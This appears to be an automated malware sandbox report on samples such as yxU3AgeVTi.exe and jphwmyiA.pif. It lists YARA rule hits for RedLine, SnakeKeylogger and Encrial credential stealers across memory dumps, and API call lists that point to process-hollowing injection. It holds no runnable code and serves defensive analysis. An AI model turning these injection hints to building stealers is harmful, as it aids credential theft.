Source: 12.2.jphwmyiA.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.1.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.jphwmyiA.pif.1e190000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.1e190000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.jphwmyiA.pif.1e190000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.jphwmyiA.pif.25350ee8.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.jphwmyiA.pif.25350ee8.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.jphwmyiA.pif.25350ee8.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.jphwmyiA.pif.29cc99de.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.jphwmyiA.pif.29cc99de.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.jphwmyiA.pif.29cc99de.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.jphwmyiA.pif.250b99de.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.jphwmyiA.pif.250b99de.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.jphwmyiA.pif.250b99de.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.yxU3AgeVTi.exe.215f2418.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 4.2.Aiymwhpj.PIF.213367a8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.jphwmyiA.pif.1d9f0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.1d9f0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.jphwmyiA.pif.1d9f0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.jphwmyiA.pif.29cc99de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.jphwmyiA.pif.29cc99de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.jphwmyiA.pif.29cc99de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.jphwmyiA.pif.250b99de.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.jphwmyiA.pif.250b99de.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.jphwmyiA.pif.250b99de.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.Aiymwhpj.PIF.213733d8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.3.jphwmyiA.pif.27e8ce70.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.3.jphwmyiA.pif.27e8ce70.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.3.jphwmyiA.pif.27e8ce70.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.jphwmyiA.pif.25350ee8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.jphwmyiA.pif.25350ee8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.jphwmyiA.pif.25350ee8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.jphwmyiA.pif.29cca8c6.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.jphwmyiA.pif.29cca8c6.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.jphwmyiA.pif.29cca8c6.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.jphwmyiA.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.jphwmyiA.pif.29f60000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.jphwmyiA.pif.29f60000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.jphwmyiA.pif.29f60000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.jphwmyiA.pif.250ba8c6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.jphwmyiA.pif.250ba8c6.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.jphwmyiA.pif.250ba8c6.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.1.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.jphwmyiA.pif.29f60ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.jphwmyiA.pif.29f60ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.jphwmyiA.pif.29f60ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.jphwmyiA.pif.1b30a8c6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.1b30a8c6.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.jphwmyiA.pif.1b30a8c6.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.jphwmyiA.pif.1b3099de.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.1b3099de.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.jphwmyiA.pif.1b3099de.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.jphwmyiA.pif.1d9f0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.1d9f0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.jphwmyiA.pif.1d9f0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.1.jphwmyiA.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.1.jphwmyiA.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.jphwmyiA.pif.1b3099de.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.1b3099de.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.jphwmyiA.pif.1b3099de.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.jphwmyiA.pif.27870000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.1.jphwmyiA.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.jphwmyiA.pif.29f60000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.jphwmyiA.pif.2a120000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.jphwmyiA.pif.2a120000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.jphwmyiA.pif.2a120000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.yxU3AgeVTi.exe.21659f78.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.jphwmyiA.pif.27870000.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.3.jphwmyiA.pif.2352c260.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.jphwmyiA.pif.2a120000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.jphwmyiA.pif.1b30a8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.1b30a8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.3.jphwmyiA.pif.2352c260.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.jphwmyiA.pif.2a120000.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.1.jphwmyiA.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.jphwmyiA.pif.27870000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.jphwmyiA.pif.27870000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.jphwmyiA.pif.25350000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.jphwmyiA.pif.27870000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.jphwmyiA.pif.25350000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.jphwmyiA.pif.1b30a8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.jphwmyiA.pif.25350000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.jphwmyiA.pif.2a120000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.jphwmyiA.pif.29f60000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.jphwmyiA.pif.1e190000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.1d9f0ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.3.jphwmyiA.pif.2352c260.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.3.jphwmyiA.pif.2352c260.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.jphwmyiA.pif.29cca8c6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.3.jphwmyiA.pif.2352c260.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.jphwmyiA.pif.29cca8c6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.jphwmyiA.pif.1e190000.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.jphwmyiA.pif.1d9f0ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.jphwmyiA.pif.1d9f0ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.3.jphwmyiA.pif.2352c260.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.jphwmyiA.pif.1e190000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.jphwmyiA.pif.27870000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.jphwmyiA.pif.29f60000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.jphwmyiA.pif.29cca8c6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.jphwmyiA.pif.25350000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.1d9f0ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.1d9f0ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.jphwmyiA.pif.1d9f0ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.jphwmyiA.pif.25350000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.jphwmyiA.pif.25350000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000003.00000002.4109204899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000001.1687216190.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000C.00000002.4109307157.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.4109202248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000007.00000001.1805725850.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000C.00000001.1881316189.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: Process Memory Space: jphwmyiA.pif PID: 340, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: jphwmyiA.pif PID: 6800, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: jphwmyiA.pif PID: 3808, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_0294824C NtReadVirtualMemory,	0_2_0294824C
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_029484BC NtUnmapViewOfSection,	0_2_029484BC
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_02948BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_02948BA8
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_029479AC NtAllocateVirtualMemory,	0_2_029479AC
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_0294DE78 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_0294DE78
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_0294DFE4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_0294DFE4
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_0294DF00 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_0294DF00
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_02947CF8 NtWriteVirtualMemory,	0_2_02947CF8
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_02948BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_02948BA6
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_029479AA NtAllocateVirtualMemory,	0_2_029479AA
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_0294DE24 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_0294DE24
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 4_2_028F824C NtReadVirtualMemory,	4_2_028F824C
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 4_2_028F84BC NtUnmapViewOfSection,	4_2_028F84BC
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 4_2_028F8BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	4_2_028F8BA8
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 4_2_028F79AC NtAllocateVirtualMemory,	4_2_028F79AC
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 4_2_028FDE78 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	4_2_028FDE78
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 4_2_028FDFE4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	4_2_028FDFE4
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 4_2_028FDF00 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	4_2_028FDF00
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 4_2_028F7CF8 NtWriteVirtualMemory,	4_2_028F7CF8
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 4_2_028F7A49 NtAllocateVirtualMemory,	4_2_028F7A49
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 4_2_028F8BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	4_2_028F8BA6
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 4_2_028F79AA NtAllocateVirtualMemory,	4_2_028F79AA
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 4_2_028FDE24 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	4_2_028FDE24

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe

Code function: 0_2_0294F0A8 InetIsOffline,CoInitialize,CoUninitialize,Sleep,MoveFileA,MoveFileA,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,

0_2_0294F0A8

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_029320C4	0_2_029320C4
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_00408C60	3_2_00408C60
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_0040DC11	3_2_0040DC11
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_00407C3F	3_2_00407C3F
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_00418CCC	3_2_00418CCC
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_00406CA0	3_2_00406CA0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_004028B0	3_2_004028B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_0041A4BE	3_2_0041A4BE
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_00408C60	3_2_00408C60
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_00418244	3_2_00418244
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_00401650	3_2_00401650
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_00402F20	3_2_00402F20
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_004193C4	3_2_004193C4
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_00418788	3_2_00418788
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_00402F89	3_2_00402F89
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_00402B90	3_2_00402B90
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_004073A0	3_2_004073A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_25001551	3_2_25001551
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_25001560	3_2_25001560
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_250012B0	3_2_250012B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_250012C0	3_2_250012C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2792B7AB	3_2_2792B7AB
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2792D490	3_2_2792D490
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2792B4C7	3_2_2792B4C7
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2792B1DF	3_2_2792B1DF
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_279241EB	3_2_279241EB
